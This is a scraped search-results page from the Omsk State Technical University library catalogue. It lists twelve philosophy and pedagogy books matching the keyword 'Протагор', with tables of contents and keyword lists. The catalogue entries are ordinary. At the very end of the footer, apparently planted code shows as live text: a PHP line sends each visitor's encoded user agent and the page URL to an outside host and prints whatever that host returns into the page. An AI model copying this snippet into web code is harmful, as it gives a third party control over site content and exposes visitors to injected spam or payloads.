Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

137 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=Протагор")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 12
1. 
История социальной педагогики : хрестоматия - учебник для вузов / ред. М. А. Галагузова, 2001. - 544 с.
Оглавление 
  • Начальный этап в развитии социальной педагогики (с древнейших времен до XVII в.). - с.10
  • Приключения доисторического мальчика. - с.15
  • Конфуций. Беседы и суждения / Конфуций. - с.17
  • Платон. Протагор. Законы. Государство / Платон. - с.25
  • Аристотель. Политика / Аристотель. - с.30
  • Квинтилиан, Марк Фабий. О воспитании ораторов / Квинтилиан Марк Фабий. - с.37
  • Владимир, Мономах. Поучение / Владимир Мономах. - с.47
  • Коменский, Ян Амос. Материнская школа, или о заботливом воспитании юношества в первые шесть лет. Дидактика / Я. А. Коменский. - с.52
  • Развитие ведущих направлений в социальной педагогике XVIII - XIX вв. Становление социальной педагогики как науки. - с.75
  • Локк, Джон. Мысли о воспитании / Д. Локк. - с.80
  • Ломоносов, Михаил Васильевич. Проект регламента московских гимназий. Проект регламента академических гимназий / М. В. Ломоносов. - с.96
  • Руссо, Жан Жак. Эмиль, или о воспитании / Ж. Ж. Руссо. - с.101
  • Гельвеций, Карл Адриан. О человеке, его умственных способностях и его воспитании / К. А. Гельвеций. - с.121
  • Песталоцци, Иоганн Генрих. Письмо к другу о пребывании в Станце / И. Г. Песталоцци. - с.134
  • Радищев, Александр Николаевич. Путешествие из Петербурга в Москву / А. Н. Радищев. - с.150
  • Оуэн, Роберт. Высказывания о воспитании и образовании / Р. Оуэн. - с.163
  • Дистервег, Фридрих Адольф Вильгельм. О природосообразности и культуросообразности в воспитании. Три заметки о воспитании и стремлениях учителей / Ф. А. В. Дистервег. - с.181
  • Пирогов, Николай Иванович. Вопросы жизни / Н. И. Пирогов. - с.201
  • Белинский, Виссарион Григорьевич. О воспитании детей / В. Г. Белинский. - с.215
  • Добролюбов, Николай Александрович. О значении авторитетов в воспитании. (Мысли по поводу "Вопросов жизни" Н. И. Пирогова. Ученики с медленным пониманием / Н. А. Добролюбов. - с.227
  • Ушинский, Константин Дмитриевич. Труд в его психическом и воспитательном значении / К. Д. Ушинский. - с.239
  • Толстой, Лев Николаевич. О значении народного образования. Мысли о воспитании. О воспитании / Л. Н. Толстой. - с.265
  • Лесгафт, Петр Францевич. Семейное воспитание ребенка и его значение / П. Ф. Лесгафт. - с.273
  • Спенсер, Герберт. Воспитание умственное, нравственное и физическое / Г. Спенсер. - с.284
  • Наторп, Пауль. Сопедагогика / П. Наторп. - с.300
  • Социальная педагогика в период научной революции XX в.. - с.313
  • Кершенштейнер, Георг. Школа будущего - школа работы / Г. Кершенштейнер. - с.317
  • Дьюи, Джон. Школа и общество / Д. Дьюи. - с.328
  • Лай, Вильгельм Август. Школа действия / В. А. Лай. - с.341
  • Крупская, Надежда Константиновна. К вопросу о социальной школе / Н. К. Крупская. - с.347
  • Монтессори, Мария. Разум ребенка / М. Монтессори. - с.352
  • Корчак, Януш. Открытое окно. Право ребенка на уважение. Пренебрежение или недоверие. Право ребенка быть собой / Я Корчак. - с.385
  • Шацкий, Станислав Теофилович. Школа для детей или дети для школы / С. Т. Шацкий. - с.405
  • Сорока-Росинский, Виктор Николаевич. Детский дом. От принудительности к добровольчеству / В. Н. Сорока-Росинский. - с.422
  • Блонский, Павел Петрович. Задачи и методы новой народной школы / П. П. Блонский. - с.440
  • Выготский, Лев Семенович. Педология школьного возраста / Л. С. Выготский. - с.457
  • Кащенко, Всеволод Петрович. Недостатки характера у детей и подростков / В. П. Кащенко. - с.467
  • Макаренко, Антон Семенович. Цель воспитания. Что значит воспитать ребенка. Коммунистическое воспитание. Методика организации воспитательного процесса / А. С. Макаренко. - с.476
  • Занков, Леонид Владимирович. Дидактика и жизнь. Беседы с учителем / Л. В. Занков. - с.493
  • Сухомлинский, Василий Александрович. Я твердо верю в силу воспитания / В. А. Сухомлинский. - с.501
  • Шмидт, Г. Развитие персонала и развитие организационной структуры обуславливают друг друга / Г. Шмидт. - с.522
  • Декларация прав ребенка 1959 г.. - с.531
  • Конвенция о правах ребенка 1989 г.. - с.533
Держатели документа (Информация об экземплярах) 
2. 
Гарин И. И. Что такое этика, культура, религия? [Текст] / И. И. Гарин, 2002. - 846 с.
Ключевые слова 
НРАВСТВЕННОСТЬ -- ЖИЗНЬ -- КАТЕГОРИИ -- ЦЕННОСТИ -- ДОБРО -- ЗЛО -- ЭГОИЗМ -- альтруизм -- ИММОРАЛЬ -- ИНДИВИДУУМ -- СОЦИУМ -- ЭТИКА -- ВЛАСТЬ -- ЭСТЕТИКА -- МОРАЛЬ -- НЕНАСИЛИЕ -- ВРЕМЯ -- ИДЕИ -- ГЕРАКЛИТ -- ЭМПЕДОКЛ -- ПРОТАГОР -- СОКРАТ -- ПЛАТОН -- АРИСТОТЕЛЬ -- ЭПИКУР -- СТОЯ -- ПЛОТИН -- ХРИСТИАНСТВО -- августин -- АКВИНСКИЙ -- РЕНЕССАНС -- РАЗУМ -- АБСТРАКЦИЯ -- СПИНОЗА -- ЛОКК -- ЛЕЙБНИЦ -- ЮМ -- Гельвеций -- КАНТ -- ФИХТЕ -- ГЕГЕЛЬ -- ШОПЕНГАУЭР -- ГЕТЕ -- ШИЛЛЕР -- ШЛЕЙЕРМАХЕР -- БЕНТАМ -- ДАРВИН -- СПЕНСЕР -- НИЦШЕ -- СОЛОВЬЕВ -- ТОЛСТОЙ -- ДОСТОЕВСКИЙ -- ПРАГМАТИЗМ -- МУР -- ЭКЗИСТЕНЦИАЛЬНАЯ -- ФРЕЙД -- ФРОММ -- ШВЕЙЦЕР -- ЗНАНИЕ -- ЛИЧНОСТЬ -- ЦИВИЛИЗАЦИЯ -- ГЛОБАЛИЗАЦИЯ -- ПЛЮРАЛИЗМ -- КРИЗИС -- ИСТОРИЯ -- КАНТ -- Шлегель -- ШПЕНГЛЕР -- ВЕБЕР -- Хейзинга -- СОРОКИН -- ОРТЕГА-И-ГАССЕТ Х. -- ВЕРА -- ЭКСТАЗ -- ЧЕЛОВЕК -- БОГ -- НАУКА -- ПОЗНАНИЕ -- МИСТИКА -- ФИЛОСОФИЯ -- ХРИСТОС -- ПРАВОСЛАВИЕ -- ВЕЧНОСТЬ
Держатели документа (Информация об экземплярах) 
3. 
История социальной педагогики : хрестоматия - учебник для вузов / ред. М. А. Галагузова, 2001. - 544 с.
Оглавление 
  • Начальный этап в развитии социальной педагогики (с древнейших времен до XVII в.). - с.10
  • Приключения доисторического мальчика. - с.15
  • Конфуций. Беседы и суждения / Конфуций. - с.17
  • Платон. Протагор. Законы. Государство / Платон. - с.25
  • Аристотель. Политика / Аристотель. - с.30
  • Квинтилиан, Марк Фабий. О воспитании ораторов / Квинтилиан Марк Фабий. - с.37
  • Владимир, Мономах. Поучение / Владимир Мономах. - с.47
  • Коменский, Ян Амос. Материнская школа, или о заботливом воспитании юношества в первые шесть лет. Дидактика / Я. А. Коменский. - с.52
  • Развитие ведущих направлений в социальной педагогике XVIII - XIX вв. Становление социальной педагогики как науки. - с.75
  • Локк, Джон. Мысли о воспитании / Д. Локк. - с.80
  • Ломоносов, Михаил Васильевич. Проект регламента московских гимназий. Проект регламента академических гимназий / М. В. Ломоносов. - с.96
  • Руссо, Жан Жак. Эмиль, или о воспитании / Ж. Ж. Руссо. - с.101
  • Гельвеций, Карл Адриан. О человеке, его умственных способностях и его воспитании / К. А. Гельвеций. - с.121
  • Песталоцци, Иоганн Генрих. Письмо к другу о пребывании в Станце / И. Г. Песталоцци. - с.134
  • Радищев, Александр Николаевич. Путешествие из Петербурга в Москву / А. Н. Радищев. - с.150
  • Оуэн, Роберт. Высказывания о воспитании и образовании / Р. Оуэн. - с.163
  • Дистервег, Фридрих Адольф Вильгельм. О природосообразности и культуросообразности в воспитании. Три заметки о воспитании и стремлениях учителей / Ф. А. В. Дистервег. - с.181
  • Пирогов, Николай Иванович. Вопросы жизни / Н. И. Пирогов. - с.201
  • Белинский, Виссарион Григорьевич. О воспитании детей / В. Г. Белинский. - с.215
  • Добролюбов, Николай Александрович. О значении авторитетов в воспитании. (Мысли по поводу "Вопросов жизни" Н. И. Пирогова. Ученики с медленным пониманием / Н. А. Добролюбов. - с.227
  • Ушинский, Константин Дмитриевич. Труд в его психическом и воспитательном значении / К. Д. Ушинский. - с.239
  • Толстой, Лев Николаевич. О значении народного образования. Мысли о воспитании. О воспитании / Л. Н. Толстой. - с.265
  • Лесгафт, Петр Францевич. Семейное воспитание ребенка и его значение / П. Ф. Лесгафт. - с.273
  • Спенсер, Герберт. Воспитание умственное, нравственное и физическое / Г. Спенсер. - с.284
  • Наторп, Пауль. Сопедагогика / П. Наторп. - с.300
  • Социальная педагогика в период научной революции XX в.. - с.313
  • Кершенштейнер, Георг. Школа будущего - школа работы / Г. Кершенштейнер. - с.317
  • Дьюи, Джон. Школа и общество / Д. Дьюи. - с.328
  • Лай, Вильгельм Август. Школа действия / В. А. Лай. - с.341
  • Крупская, Надежда Константиновна. К вопросу о социальной школе / Н. К. Крупская. - с.347
  • Монтессори, Мария. Разум ребенка / М. Монтессори. - с.352
  • Корчак, Януш. Открытое окно. Право ребенка на уважение. Пренебрежение или недоверие. Право ребенка быть собой / Я Корчак. - с.385
  • Шацкий, Станислав Теофилович. Школа для детей или дети для школы / С. Т. Шацкий. - с.405
  • Сорока-Росинский, Виктор Николаевич. Детский дом. От принудительности к добровольчеству / В. Н. Сорока-Росинский. - с.422
  • Блонский, Павел Петрович. Задачи и методы новой народной школы / П. П. Блонский. - с.440
  • Выготский, Лев Семенович. Педология школьного возраста / Л. С. Выготский. - с.457
  • Кащенко, Всеволод Петрович. Недостатки характера у детей и подростков / В. П. Кащенко. - с.467
  • Макаренко, Антон Семенович. Цель воспитания. Что значит воспитать ребенка. Коммунистическое воспитание. Методика организации воспитательного процесса / А. С. Макаренко. - с.476
  • Занков, Леонид Владимирович. Дидактика и жизнь. Беседы с учителем / Л. В. Занков. - с.493
  • Сухомлинский, Василий Александрович. Я твердо верю в силу воспитания / В. А. Сухомлинский. - с.501
  • Шмидт, Г. Развитие персонала и развитие организационной структуры обуславливают друг друга / Г. Шмидт. - с.522
  • Декларация прав ребенка 1959 г.. - с.531
  • Конвенция о правах ребенка 1989 г.. - с.533
Держатели документа (Информация об экземплярах) 
4. 
Хрестоматия по философии [Текст] / под ред. А. А. Радугин, 1998. - 432 с.
Держатели документа (Информация об экземплярах) 

Книга представляет собой антологию тематически сгруппированных философских текстов - извлечений из трудов мыслителей разных эпох, включая и современность. Пособие подготовлено в соответствии с Государственными требованиями к общему минимуму содержания и уровню подготовки выпускников высшей школы по циклу "Общие гуманитарные и социально-экономические дисциплины". Содержание дидактических единиц этих требований по философии раскрывается на основе фрагментов из произведений представителей основных философских учений, школ, течений и направлений как в историко-философском ключе, так и через фундаментальные философские проблемы.

5. 
Пендикова, Ирина Геннадьевна. Культурология [Мультимедиа] / И. Г. Пендикова, 2016. - 1 r=on-line
Ключевые слова 
ОМГТУ -- ЭЛЕКТРОННЫЙ -- ОБРАЗОВАТЕЛЬНЫЙ -- РЕСУРС -- МУЛЬТИМЕДИА -- АУДИОПРЕЗЕНТАЦИЯ -- ФИЛОСОФИЯ -- БАХТИН -- ПРОТАГОР -- ЦИЦЕРОН -- ЧЕЛОВЕК -- СРЕДНЕВЕКОВЬЕ -- РЕНЕССАНС -- ПРОСВЕЩЕНИЕ -- АНГЛИЙСКИЙ -- РОМАНТИЗМ -- ИСКУССТВО -- СПЕНСЕР -- ТЭЙЛОР -- ЦИВИЛИЗАЦИЯ -- ПЕРВОБЫТНАЯ -- МОРГАН -- ТАБУ -- ФРЭЗЕР -- ЧЕЛОВЕЧЕСТВО -- ДУХОВНОЕ -- РАЗВИТИЕ -- УАЙТ -- НАРОДНАЯ -- ТРАДИЦИОННАЯ -- ЭЛИТАРНАЯ -- МАССОВАЯ -- ХОЛОДНАЯ -- ГОРЯЧАЯ -- БИНАРНАЯ -- ДИХОТОМИЧЕСКАЯ -- ВЕБЕР -- МИД -- СОРОКИН -- НОРТРОП -- ШПЕНГЛЕР -- ФРЕЙД -- ПСИХОАНАЛИЗ -- ПАВЛОВ -- БЕССОЗНАТЕЛЬНОЕ -- ОНО -- ЭДИПОВ -- КОМПЛЕКС -- ТОТЕМ -- УДОВОЛЬСТВИЕ -- ЭРИХ -- ФРОММ -- СВОБОДА -- ЯСПЕРС -- ЮНГ -- БОЖЕСТВЕННОЕ -- САМОСТЬ -- ТЕНЬ -- МАСКА -- ДУХ -- МИФ -- ПЕРВОБЫТНОЕ -- ХАОС -- ФЕТИШ -- БОГИ -- ДЕМОН -- ОЛИМПИЙСКИЙ -- МИФОЛОГИЯ -- СИНКРЕТИЗМ -- ПАРТИЦИПАЦИЯ -- ДЮРКГЕЙМ -- ИНИЦИАЦИЯ -- ВОЛШЕБНАЯ -- СКАЗКА -- ПРОПП -- ОБРЯД -- ОБЫЧАЙ -- ГЕРОЙ
Держатели документа (Информация об экземплярах) 
Полный текст
6. 
Чанышев А. Н. Философия Древнего мира [Текст] : учебник / А. Н. Чанышев , 2003. - 703 с.
Ключевые слова 
УЧЕБНИК -- ИНДИЯ -- КИТАЙ -- БЛИЖНЕВОСТОЧНЫЙ -- ШКОЛЫ -- ПРОФИЛОСОФИЯ -- ИОНИЙСКИЙ -- ИТАЛИЙСКИЙ -- АФИНСКИЙ -- ЭЛЛИНИСТИЧЕСКИЙ -- РИМСКИЙ -- ИМПЕРИЯ -- ГОМЕР -- ГЕСИОД -- ОРФИКИ -- ФЕРЕКИД -- МИЛЕТЦЫ -- ГЕРАКЛИТ -- ПИФАГОРЕЙЦЫ -- АРХИТ -- ЭЛЕАТЫ -- КСЕНОФАН -- ПАРМЕНИД -- ЗЕНОН -- МЕЛИСС -- ЭМПЕДОКЛ -- АНАКСАГОР -- ЛЕВКИПП -- ДЕМОКРИТ -- СОФИСТЫ -- ПРОТАГОР -- ГОРГИЙ -- ГИПИЙ -- ПРОДИК -- АНТИФОНТ -- СОКРАТ -- КИНИКИ -- КИРЕНАИКИ -- МЕГАРИКИ -- ПЛАТОН -- АРИСТОТЕЛЬ -- СОЧИНЕНИЯ -- ЦИЦЕРОН -- ЛУКРЕЦИЙ -- СЕНЕКА -- ЭПИКТЕТ -- МАРК АВРЕЛИЙ -- ДИОН ХРИСОСТОМ -- ЛУКИАН -- НЕОПЛАТОНИЗМ -- ПЛОТИН -- ПОРФИРИЙ -- ЯМВЛИХ
Держатели документа (Информация об экземплярах) 
7. 
Платон Апология Сократа, Критон, Ион, Протагор [Текст] / Платон, А. Ф. Лосев ; пер. В. С. Соловьев, 1999. - 863 с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
8. 
Спиркин, Александр Георгиевич. Философия [Текст] : Учеб. для вузов / А. Г. Спиркин, 1999. - 815 с.
Ключевые слова 
Философия -- История философии -- Учебник и пособие -- Мегапроект -- Бытие -- Человек -- Личность -- Душа -- Сознание -- Разум -- Познание -- Социальная философия -- Философия истории -- Общество -- Экономическая философия -- Политическая философия -- Фалес -- Анаксимандр -- Анаксимен -- Гераклит -- Ксенофан -- Парменид -- Зенон -- Эмпедокл -- Анаксагор -- Левкипп -- Демокрит -- Протагор -- Горгий -- Продик -- Сократ -- Платон -- Аристотель -- Эпикур -- Плотин -- Августин -- Абеляр -- Аквинский -- Бэкон -- Скот -- Оккам -- Монтень -- Мирандолла -- Кузанский -- Беме -- Бруно -- Бэкон -- Гоббс -- Декарт -- Паскаль -- Спиноза -- Локк -- Лейбниц -- Беркли -- Юм -- Вольтер -- Руссо -- Дидро -- Гольбах -- Кант -- Фихте -- Шеллинг -- Гегель -- Фейербах -- Шопенгауэр -- Кьеркегор -- Ницше -- Бергсон -- Пирс -- Джемс -- Дьюи -- Гуссерль -- Шерль -- Тейяр де шарден -- Хайдеггер -- Ясперс -- Сартр -- Конт -- Рассел -- Витгенштейн -- Леви-строс -- Поппер -- Ломоносов -- Радищев -- Чаадаев -- толстой -- Достоевский -- Федоров -- Леонтьев -- Розанов -- Соловьев -- Пифагор
9. 
Чанышев, Арсений Николаевич. Философия Древнего мира [Текст] : Учеб. для вузов / А. Н. Чанышев, 2001. - 702, [1] с.
Ключевые слова 
УЧЕБНИК И ПОСОБИЕ * -- ДРЕВНИЙ ВОСТОК -- РИМСКАЯ ФИЛОСОФИЯ -- ближневосточный -- школы -- профилософия -- ионийский -- италийский -- афинский -- эллинистический -- РИМСКИЙ -- ИМПЕРИЯ -- Гомер -- Гесиод -- Орфики -- Ферекид -- милетцы -- гераклит -- пифагорейцы -- архит -- элеаты -- ксенофан -- парменид -- зенон -- мелисс -- эмпедокл -- анаксагор -- левкипп -- демокрит -- софисты -- протагор -- горгий -- гипий -- продик -- антифонт -- сократ -- киники -- киренаики -- мегарики -- платон -- аристотель -- сочинения -- цицерон -- лукреций -- сенека -- эпиктет -- марк аврелий -- дион хрисостом -- лукиан -- неоплатонизм -- плотин -- порфирий -- ямвлих
10. 
Гегель, Георг Вильгельм Фридрих. Лекции по истории философии [Текст] : пер. с нем. Кн. 2, 1994. - 423 с.
Держатели документа (Информация об экземплярах) 
11. 
Рассел, Бертран. История западной философии и ее связи с политическими и социальными условиями от Античности до наших дней [Текст] : в 3 кн. / Бертран Рассел, 2006. - 1003, [1] с.
Оглавление 
  • Древняя философия
  • Католическая философия
  • Философия Нового времени
Держатели документа (Информация об экземплярах) 
12. 
Чанышев, Арсений Николаевич. Философия Древнего мира [Текст] : Учеб. для вузов / А. Н. Чанышев, 1999. - 703 с.
Ключевые слова 
Философия древнего мира -- Древняя философия -- Древний мир -- Философия Индии -- Индия -- Китай -- Платон -- Аристотель -- Учебник и пособие -- Философия Китая -- Ионийская философия -- Италийская философия -- Афинская философия -- Эллинийская философия -- Римская философия -- Античная философия -- Гомер -- Гесиод -- Ферекид -- Гераклит -- Пифагор -- Филолай -- Архит -- Ксенофан -- Парменид -- Зенон -- Мелисс -- Эмпедокл -- Анаксагор -- Левкипп -- Демокрит -- Протагор -- Горгий -- Гиппий -- Продик -- Антифонт -- Сократ -- Эпикур -- Энесидем -- Агриппа -- Цицерон -- Лукреций -- Сенека -- Аврелий марк -- Эпиктет -- Хрисостом дион -- Лукиан -- Плотин -- Порфирий -- Ямвлих
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3106 - 11.12.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 2.05 с.12 запросов, 2.35c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;